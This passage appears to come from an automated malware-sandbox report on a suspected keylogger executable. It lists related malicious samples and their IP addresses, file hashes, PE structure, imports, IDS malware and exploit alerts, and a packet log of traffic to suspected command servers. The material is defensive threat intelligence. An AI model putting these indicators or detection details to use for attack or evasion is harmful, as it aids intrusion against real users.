                                                                                                                      • 141.98.10.88
                                                                                                                      DOC11042024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 141.98.10.40
                                                                                                                      Contract #U2116 KB #U2013 08152024 - 1.pif.exeGet hashmaliciousRedLineBrowse
                                                                                                                      • 141.98.10.33
                                                                                                                      PRODUCT OVERVIEW.docGet hashmaliciousUnknownBrowse
                                                                                                                      • 141.98.10.11
                                                                                                                      tppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 141.98.10.95
                                                                                                                      sarm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 141.98.10.95
                                                                                                                      TRIAL IMG_00O0125RDER.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 141.98.10.120
                                                                                                                      1316wjL1Ep.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 141.98.10.95
                                                                                                                      17213054441f2891f24374c97759e4ac14183d6cfaeabe4240dc8794e61fa899b9e40b62fb429.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 141.98.10.11
                                                                                                                      Demand G2-2024.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                      • 141.98.10.47
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9ad17312555432bcbd00414ec1c141b698268dc6112a629b7da7379b907daaee7a87ea4e066bb444.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      Curriculum Vitae Estrella Torres.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      Inquiry HA-22-28199 22-077.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      ERxqzVIPur.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      ERxqzVIPur.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      zam.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      fatura.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      MJ5bO7kS7j.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0e17312555432bcbd00414ec1c141b698268dc6112a629b7da7379b907daaee7a87ea4e066bb444.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Setup.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      A3W2CpXxiO.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      WDSecureUtilities(1).exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      1.cmdGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Exploit Detector.batGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      No context
                                                                                                                      No created / dropped files found
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.303287019079011
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      File size:207'360 bytes
                                                                                                                      MD5:c0dc27117e14576d09eeb3f5285890fd
                                                                                                                      SHA1:a635782cc229cc9d78ad2ca07232bc8a9d1e35ea
                                                                                                                      SHA256:e15f96a8007148677667e284c9047ac9928f979cdf06d371b776816df51ee480
                                                                                                                      SHA512:70996b34fc2d6094cea47421b2fae5b7f89f6913ee966ab5f0c02b4b294e057646f3eabd6821a5a1f26c602eda17470aa02ace1a396d176512b4532de9cba2e9
                                                                                                                      SSDEEP:3072:0DKW1LgppLRHMY0TBfJvjcTp5XrkgzXyvf4PUH2weet7bY6:0DKW1Lgbdl0TBBvjc/rkC+QPU7bd
                                                                                                                      TLSH:FD14BF1171D1C1B3C4B7117044E6CB7A9A3970710B6A96D7B7DC2BBA6F212E1A3362CE
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~...................f....PE..L...t..P..........#........
                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                      Entrypoint:0x40cd2f
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:5
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:5
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:5
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:bf5a4aa99e5b160f8521cadd6bfe73b8
                                                                                                                      Instruction
                                                                                                                      call 00007F9F18B809A6h
                                                                                                                      jmp 00007F9F18B7AB69h
                                                                                                                      mov edi, edi
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      sub esp, 20h
                                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      push 00000008h
                                                                                                                      pop ecx
                                                                                                                      mov esi, 0041F058h
                                                                                                                      lea edi, dword ptr [ebp-20h]
                                                                                                                      rep movsd
                                                                                                                      mov dword ptr [ebp-08h], eax
                                                                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                                                                      pop edi
                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                      pop esi
                                                                                                                      test eax, eax
                                                                                                                      je 00007F9F18B7ACCEh
                                                                                                                      test byte ptr [eax], 00000008h
                                                                                                                      je 00007F9F18B7ACC9h
                                                                                                                      mov dword ptr [ebp-0Ch], 01994000h
                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                      push eax
                                                                                                                      push dword ptr [ebp-10h]
                                                                                                                      push dword ptr [ebp-1Ch]
                                                                                                                      push dword ptr [ebp-20h]
                                                                                                                      call dword ptr [0041B000h]
                                                                                                                      leave
                                                                                                                      retn 0008h
                                                                                                                      ret
                                                                                                                      mov eax, 00413563h
                                                                                                                      mov dword ptr [004228E4h], eax
                                                                                                                      mov dword ptr [004228E8h], 00412C4Ah
                                                                                                                      mov dword ptr [004228ECh], 00412BFEh
                                                                                                                      mov dword ptr [004228F0h], 00412C37h
                                                                                                                      mov dword ptr [004228F4h], 00412BA0h
                                                                                                                      mov dword ptr [004228F8h], eax
                                                                                                                      mov dword ptr [004228FCh], 004134DBh
                                                                                                                      mov dword ptr [00422900h], 00412BBCh
                                                                                                                      mov dword ptr [00422904h], 00412B1Eh
                                                                                                                      mov dword ptr [00422908h], 00412AABh
                                                                                                                      ret
                                                                                                                      mov edi, edi
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      call 00007F9F18B7AC5Bh
                                                                                                                      call 00007F9F18B814E0h
                                                                                                                      cmp dword ptr [ebp+00h], 00000000h
                                                                                                                      Programming Language:
                                                                                                                      • [ASM] VS2008 build 21022
                                                                                                                      • [IMP] VS2005 build 50727
                                                                                                                      • [C++] VS2008 build 21022
                                                                                                                      • [ C ] VS2008 build 21022
                                                                                                                      • [LNK] VS2008 build 21022
                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x215b40x50.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x109ec.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1b1c00x1c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x20da00x40.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x184.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x197180x1980014e3362c692030e97b774abdb5cfb6c1False0.5789483762254902data6.7485161440849435IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x1b0000x6db40x6e005826801f33fc1b607aa8e942aa92e9faFalse0.5467329545454546data6.442956247632331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x220000x30c00x16002fe51a72ede820cd7cf55a77ba59b1f4False0.3126775568181818data3.2625868398009703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc0x260000x109ec0x10a002914e33fa49ffc35c046f94a4d53c574False0.9696017387218046data7.970361844435263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_RCDATA0x261240xf92edata1.0004075873961435
                                                                                                                      RT_RCDATA0x35a540x20data1.28125
                                                                                                                      RT_VERSION0x35a740x31cdata0.4296482412060301
                                                                                                                      RT_MANIFEST0x35d900xc5bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.3926651912741069
                                                                                                                      DLLImport
                                                                                                                      KERNEL32.dllRaiseException, GetLastError, MultiByteToWideChar, lstrlenA, InterlockedDecrement, GetProcAddress, LoadLibraryA, FreeResource, SizeofResource, LockResource, LoadResource, FindResourceA, GetModuleHandleA, Module32Next, CloseHandle, Module32First, CreateToolhelp32Snapshot, GetCurrentProcessId, SetEndOfFile, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, GetLocaleInfoA, HeapFree, GetProcessHeap, HeapAlloc, GetCommandLineA, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, ReadFile, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, FlushFileBuffers, SetFilePointer, SetHandleCount, GetFileType, GetStartupInfoA, RtlUnwind, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CompareStringA, CompareStringW, SetEnvironmentVariableA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
                                                                                                                      ole32.dllOleInitialize
                                                                                                                      OLEAUT32.dllSafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector, VariantClear, VariantInit, SysFreeString, SysAllocString
                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-11-10T21:43:56.804013+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730193.122.6.16880TCP
                                                                                                                      2024-11-10T21:43:59.132182+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730193.122.6.16880TCP
                                                                                                                      2024-11-10T21:43:59.859447+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449732188.114.97.3443TCP
                                                                                                                      2024-11-10T21:44:00.757146+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733193.122.6.16880TCP
                                                                                                                      2024-11-10T21:44:02.397777+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449735193.122.6.16880TCP
                                                                                                                      2024-11-10T21:44:04.054141+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449737193.122.6.16880TCP
                                                                                                                      2024-11-10T21:44:05.679078+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449739193.122.6.16880TCP
                                                                                                                      2024-11-10T21:44:06.393227+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449740188.114.97.3443TCP
                                                                                                                      2024-11-10T21:44:07.288480+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449741193.122.6.16880TCP
                                                                                                                      2024-11-10T21:44:09.647704+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449744188.114.97.3443TCP
                                                                                                                      2024-11-10T21:44:11.687144+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449746188.114.97.3443TCP
                                                                                                                      2024-11-10T21:44:15.144401+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.449748TCP
                                                                                                                      2024-11-10T21:44:53.944322+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449755TCP
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Nov 10, 2024 21:43:55.667594910 CET4973080192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:43:55.672406912 CET8049730193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:55.672482014 CET4973080192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:43:55.672642946 CET4973080192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:43:55.677366018 CET8049730193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:56.497616053 CET8049730193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:56.509068966 CET4973080192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:43:56.513868093 CET8049730193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:56.752751112 CET8049730193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:56.804013014 CET4973080192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:43:57.654812098 CET49731443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:57.654833078 CET44349731188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:57.654911041 CET49731443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:57.668299913 CET49731443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:57.668313026 CET44349731188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:58.474714041 CET44349731188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:58.474822998 CET49731443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:58.479126930 CET49731443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:58.479137897 CET44349731188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:58.479466915 CET44349731188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:58.522788048 CET49731443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:58.524765015 CET49731443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:58.567332983 CET44349731188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:58.678559065 CET44349731188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:58.678610086 CET44349731188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:58.678663015 CET49731443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:58.684443951 CET49731443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:58.689374924 CET4973080192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:43:58.694216967 CET8049730193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:59.083235025 CET8049730193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:59.085452080 CET49732443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:59.085513115 CET44349732188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:59.085581064 CET49732443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:59.085956097 CET49732443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:59.085968971 CET44349732188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:59.132181883 CET4973080192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:43:59.698565960 CET44349732188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:59.700236082 CET49732443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:59.700268984 CET44349732188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:59.859468937 CET44349732188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:59.859534979 CET44349732188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:59.859589100 CET49732443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:59.860061884 CET49732443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:43:59.863193989 CET4973080192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:43:59.864079952 CET4973380192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:43:59.868530989 CET8049730193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:59.868585110 CET4973080192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:43:59.868885994 CET8049733193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:59.868959904 CET4973380192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:43:59.870970011 CET4973380192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:43:59.875698090 CET8049733193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:00.712590933 CET8049733193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:00.713673115 CET49734443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:00.713720083 CET44349734188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:00.713784933 CET49734443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:00.714008093 CET49734443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:00.714019060 CET44349734188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:00.757145882 CET4973380192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:01.321568966 CET44349734188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:01.323393106 CET49734443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:01.323416948 CET44349734188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:01.489473104 CET44349734188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:01.489535093 CET44349734188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:01.489667892 CET49734443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:01.490098953 CET49734443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:01.493340969 CET4973380192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:01.494321108 CET4973580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:01.498692989 CET8049733193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:01.498893976 CET4973380192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:01.499105930 CET8049735193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:01.499202013 CET4973580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:01.499329090 CET4973580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:01.504112959 CET8049735193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:02.342360973 CET8049735193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:02.343553066 CET49736443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:02.343596935 CET44349736188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:02.343691111 CET49736443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:02.343930960 CET49736443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:02.343945026 CET44349736188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:02.397777081 CET4973580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:02.986768007 CET44349736188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:02.990664005 CET49736443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:02.990689993 CET44349736188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:03.140321970 CET44349736188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:03.140398026 CET44349736188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:03.140466928 CET49736443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:03.141788006 CET49736443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:03.152261019 CET4973580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:03.153201103 CET4973780192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:03.157469034 CET8049735193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:03.157530069 CET4973580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:03.158016920 CET8049737193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:03.158077002 CET4973780192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:03.160031080 CET4973780192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:03.164848089 CET8049737193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:04.001070976 CET8049737193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:04.002516985 CET49738443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:04.002566099 CET44349738188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:04.002654076 CET49738443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:04.002914906 CET49738443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:04.002931118 CET44349738188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:04.054141045 CET4973780192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:04.612596989 CET44349738188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:04.614327908 CET49738443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:04.614363909 CET44349738188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:04.757729053 CET44349738188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:04.757788897 CET44349738188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:04.757848978 CET49738443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:04.758306026 CET49738443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:04.760936022 CET4973780192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:04.761835098 CET4973980192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:04.766339064 CET8049737193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:04.766397953 CET4973780192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:04.767066002 CET8049739193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:04.767129898 CET4973980192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:04.767249107 CET4973980192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:04.772389889 CET8049739193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:05.635868073 CET8049739193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:05.637053967 CET49740443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:05.637084007 CET44349740188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:05.637154102 CET49740443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:05.637377024 CET49740443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:05.637391090 CET44349740188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:05.679078102 CET4973980192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:06.247725964 CET44349740188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:06.249211073 CET49740443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:06.249233961 CET44349740188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:06.393243074 CET44349740188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:06.393312931 CET44349740188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:06.393383980 CET49740443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:06.393778086 CET49740443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:06.396773100 CET4973980192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:06.398058891 CET4974180192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:06.401945114 CET8049739193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:06.402021885 CET4973980192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:06.402863979 CET8049741193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:06.402941942 CET4974180192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:06.403038025 CET4974180192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:06.407807112 CET8049741193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:07.237343073 CET8049741193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:07.238635063 CET49742443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:07.238663912 CET44349742188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:07.238753080 CET49742443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:07.239010096 CET49742443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:07.239021063 CET44349742188.114.97.3192.168.2.4
